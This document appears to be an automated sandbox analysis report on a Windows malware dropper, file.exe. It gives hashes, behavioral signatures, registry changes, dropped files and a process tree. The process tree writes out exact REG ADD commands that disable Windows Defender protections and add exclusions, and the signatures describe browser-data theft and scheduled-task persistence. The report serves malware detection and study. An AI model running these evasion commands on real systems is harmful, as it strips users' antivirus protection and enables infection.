Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
08-02-2023 08:05
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
962ed92736c8a44686c80da6596db83d
-
SHA1
d6563904cf4bcded4d3e79d1af96a4e572bd9de6
-
SHA256
3e49e1d536eaeffd4e4c87e511b660a28d212de4d712776fda5fd5f82bb3f257
-
SHA512
cb0ac3c73739bde4d423bfa9354309a5bd3cde1692d07eb5c9b414c6c11bfa4178d903aef3c6e5f0d694d30d3695084ddda519ca5efbd190e9e6186f59f0314f
-
SSDEEP
196608:91O/Q3n/8JkrwQYt8d/5GVFr5P8X8HiZLZB1S7fXUZ+af/+U0E6010:3O/yn/8Jkr9Ytk/kdP8M8Uz8+S/+UZ8
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IwGFDhhTU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dMFexHHRtytWC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MLrIJeslOBZU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LtFzXrdCXcavHaVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IwGFDhhTU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tmuWEvHsDLUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MLrIJeslOBZU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dMFexHHRtytWC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tmuWEvHsDLUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LtFzXrdCXcavHaVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0" reg.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\International\Geo\Nation sXodmGM.exe -
Executes dropped EXE 4 IoCs
pid Process 1736 Install.exe 604 Install.exe 1304 hoCJTtn.exe 1796 sXodmGM.exe -
Loads dropped DLL 12 IoCs
pid Process 1080 file.exe 1736 Install.exe 1736 Install.exe 1736 Install.exe 1736 Install.exe 604 Install.exe 604 Install.exe 604 Install.exe 756 rundll32.exe 756 rundll32.exe 756 rundll32.exe 756 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json sXodmGM.exe -
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol hoCJTtn.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat sXodmGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 sXodmGM.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA sXodmGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA sXodmGM.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol sXodmGM.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol hoCJTtn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 sXodmGM.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini hoCJTtn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA sXodmGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA sXodmGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 sXodmGM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 sXodmGM.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\MLrIJeslOBZU2\unHddtFGiPNiD.dll sXodmGM.exe File created C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR\HHYwoEL.dll sXodmGM.exe File created C:\Program Files (x86)\dMFexHHRtytWC\RmRepzM.dll sXodmGM.exe File created C:\Program Files (x86)\dMFexHHRtytWC\fFHLiUu.xml sXodmGM.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi sXodmGM.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi sXodmGM.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak sXodmGM.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja sXodmGM.exe File created C:\Program Files (x86)\IwGFDhhTU\EoMluEw.xml sXodmGM.exe File created C:\Program Files (x86)\MLrIJeslOBZU2\bhLDgeM.xml sXodmGM.exe File created C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR\SkaLxvg.xml sXodmGM.exe File created C:\Program Files (x86)\tmuWEvHsDLUn\wUEDRBc.dll sXodmGM.exe File created C:\Program Files (x86)\IwGFDhhTU\ndtGPi.dll sXodmGM.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\kBFEjYRyDMSuETGat.job schtasks.exe File created C:\Windows\Tasks\gYDAiswqIdfuFBP.job schtasks.exe File created C:\Windows\Tasks\WMJJJLGkDVEgHktVA.job schtasks.exe File created C:\Windows\Tasks\bsXFoBxfaHoLLxRHnd.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1628 schtasks.exe 1348 schtasks.exe 952 schtasks.exe 1468 schtasks.exe 616 schtasks.exe 1620 schtasks.exe 1292 schtasks.exe 1636 schtasks.exe 1004 schtasks.exe 652 schtasks.exe 676 schtasks.exe 1780 schtasks.exe 812 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{BE9D63D8-0543-4369-9E3A-C6DC39182055} sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-ea-c2-49-7d-ab sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 sXodmGM.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates sXodmGM.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections sXodmGM.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0098000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sXodmGM.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" sXodmGM.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{BE9D63D8-0543-4369-9E3A-C6DC39182055}\WpadDecisionReason = "1" sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs sXodmGM.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" sXodmGM.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad sXodmGM.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-ea-c2-49-7d-ab\WpadDecisionReason = "1" sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sXodmGM.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{BE9D63D8-0543-4369-9E3A-C6DC39182055}\WpadDecisionTime = 903352e19c3bd901 sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{BE9D63D8-0543-4369-9E3A-C6DC39182055}\f2-ea-c2-49-7d-ab sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My sXodmGM.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-ea-c2-49-7d-ab\WpadDecision = "0" sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs sXodmGM.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings sXodmGM.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{BE9D63D8-0543-4369-9E3A-C6DC39182055}\WpadDecision = "0" sXodmGM.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{BE9D63D8-0543-4369-9E3A-C6DC39182055}\WpadNetworkName = "Network 3" sXodmGM.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1656 powershell.EXE 1656 powershell.EXE 1656 powershell.EXE 1132 powershell.EXE 1132 powershell.EXE 1132 powershell.EXE 756 powershell.EXE 756 powershell.EXE 756 powershell.EXE 540 powershell.EXE 540 powershell.EXE 540 powershell.EXE 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe 1796 sXodmGM.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1656 powershell.EXE Token: SeDebugPrivilege 1132 powershell.EXE Token: SeDebugPrivilege 756 powershell.EXE Token: SeDebugPrivilege 540 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1080 wrote to memory of 1736 1080 file.exe 28 PID 1080 wrote to memory of 1736 1080 file.exe 28 PID 1080 wrote to memory of 1736 1080 file.exe 28 PID 1080 wrote to memory of 1736 1080 file.exe 28 PID 1080 wrote to memory of 1736 1080 file.exe 28 PID 1080 wrote to memory of 1736 1080 file.exe 28 PID 1080 wrote to memory of 1736 1080 file.exe 28 PID 1736 wrote to memory of 604 1736 Install.exe 29 PID 1736 wrote to memory of 604 1736 Install.exe 29 PID 1736 wrote to memory of 604 1736 Install.exe 29 PID 1736 wrote to memory of 604 1736 Install.exe 29 PID 1736 wrote to memory of 604 1736 Install.exe 29 PID 1736 wrote to memory of 604 1736 Install.exe 29 PID 1736 wrote to memory of 604 1736 Install.exe 29 PID 604 wrote to memory of 792 604 Install.exe 31 PID 604 wrote to memory of 792 604 Install.exe 31 PID 604 wrote to memory of 792 604 Install.exe 31 PID 604 wrote to memory of 792 604 Install.exe 31 PID 604 wrote to memory of 792 604 Install.exe 31 PID 604 wrote to memory of 792 604 Install.exe 31 PID 604 wrote to memory of 792 604 Install.exe 31 PID 604 wrote to memory of 1912 604 Install.exe 33 PID 604 wrote to memory of 1912 604 Install.exe 33 PID 604 wrote to memory of 1912 604 Install.exe 33 PID 604 wrote to memory of 1912 604 Install.exe 33 PID 604 wrote to memory of 1912 604 Install.exe 33 PID 604 wrote to memory of 1912 604 Install.exe 33 PID 604 wrote to memory of 1912 604 Install.exe 33 PID 792 wrote to memory of 652 792 forfiles.exe 36 PID 792 wrote to memory of 652 792 forfiles.exe 36 PID 792 wrote to memory of 652 792 forfiles.exe 36 PID 792 wrote to memory of 652 792 forfiles.exe 36 PID 792 wrote to memory of 652 792 forfiles.exe 36 PID 792 wrote to memory of 652 792 forfiles.exe 36 PID 792 wrote to memory of 652 792 forfiles.exe 36 PID 1912 wrote to memory of 384 1912 forfiles.exe 35 PID 1912 wrote to memory of 384 1912 forfiles.exe 35 PID 1912 wrote to memory of 384 1912 forfiles.exe 35 PID 1912 wrote to memory of 384 1912 forfiles.exe 35 PID 1912 wrote to memory of 384 1912 forfiles.exe 35 PID 1912 wrote to memory of 384 1912 forfiles.exe 35 PID 1912 wrote to memory of 384 1912 forfiles.exe 35 PID 652 wrote to memory of 1860 652 cmd.exe 37 PID 652 wrote to memory of 1860 652 cmd.exe 37 PID 652 wrote to memory of 1860 652 cmd.exe 37 PID 652 wrote to memory of 1860 652 cmd.exe 37 PID 652 wrote to memory of 1860 652 cmd.exe 37 PID 652 wrote to memory of 1860 652 cmd.exe 37 PID 652 wrote to memory of 1860 652 cmd.exe 37 PID 384 wrote to memory of 940 384 cmd.exe 38 PID 384 wrote to memory of 940 384 cmd.exe 38 PID 384 wrote to memory of 940 384 cmd.exe 38 PID 384 wrote to memory of 940 384 cmd.exe 38 PID 384 wrote to memory of 940 384 cmd.exe 38 PID 384 wrote to memory of 940 384 cmd.exe 38 PID 384 wrote to memory of 940 384 cmd.exe 38 PID 384 wrote to memory of 1364 384 cmd.exe 39 PID 384 wrote to memory of 1364 384 cmd.exe 39 PID 384 wrote to memory of 1364 384 cmd.exe 39 PID 384 wrote to memory of 1364 384 cmd.exe 39 PID 384 wrote to memory of 1364 384 cmd.exe 39 PID 384 wrote to memory of 1364 384 cmd.exe 39 PID 384 wrote to memory of 1364 384 cmd.exe 39 PID 652 wrote to memory of 1260 652 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\7zSEFBC.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\7zSF5A6.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:652 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1860
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1260
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
